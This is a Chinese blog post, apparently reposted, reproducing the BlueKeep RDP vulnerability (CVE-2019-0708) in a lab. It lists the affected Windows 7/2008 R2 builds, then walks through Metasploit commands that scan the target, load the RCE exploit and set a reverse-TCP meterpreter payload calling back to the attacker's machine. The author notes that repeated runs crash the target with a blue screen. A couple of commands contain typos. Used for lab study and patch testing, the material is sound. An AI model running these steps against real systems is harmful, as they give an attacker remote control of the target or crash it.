其他分享
首页 > 其他分享> > CVE-2019-0708漏洞复现

CVE-2019-0708漏洞复现

作者:互联网

漏洞概述

远程桌面服务高危远程代码执行漏洞(CVE-2019-0708),老是有系统爆这个漏洞,但是很少能有利用的,今天搭环境来测试以下利用条件。

涉及系统版本

Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox 6)
Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 14)
Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15)
Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15.1)
Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)
Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - AWS)
Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - QEMU/KVM)

不涉及系统版本

windows 10
windows 8

漏洞复测

攻击机:kali2021 IP: 192.168.2.103
靶机:windows7 IP:192.168.2.109

1、搜索msf支持的0708模块

search 0708

2、利用扫描模块探测目标系统是否存在漏洞

use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
show options
use rhosts 192.168.2.109 //设置目标
run


表示目标存在0708漏洞

3、设置攻击模块参数

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce //设置攻击模块
show options
set rhosts 192.168.2.109 //设置目标
set lhost 192.168.2.103  //设置shell监听IP,监听端口默认即可
set payload windows/x64/meterpreter/reverse_tcp //设置payload

4、设置攻击模式,最终攻击设置如下图

show optinos targets //查看攻击模块支持的系统
set target 1         //设置攻击模块模式1
show options

5、执行攻击获取meterpreter,看起来一切顺利

run

6、多运行几次payload,发现计算机蓝屏

声明

严禁读者利用以上介绍知识点对网站进行非法操作 , 本文仅用于技术交流和学习 , 如果您利用文章中介绍的知识对他人造成损失 , 后果由您自行承担 , 如果您不能同意该约定 , 请您务必不要阅读该文章 , 感谢您的配合!

标签:R2,Windows,SP1,x64,7601,0708,2019,6.1,CVE
来源: https://www.cnblogs.com/renhaoblog/p/14785381.html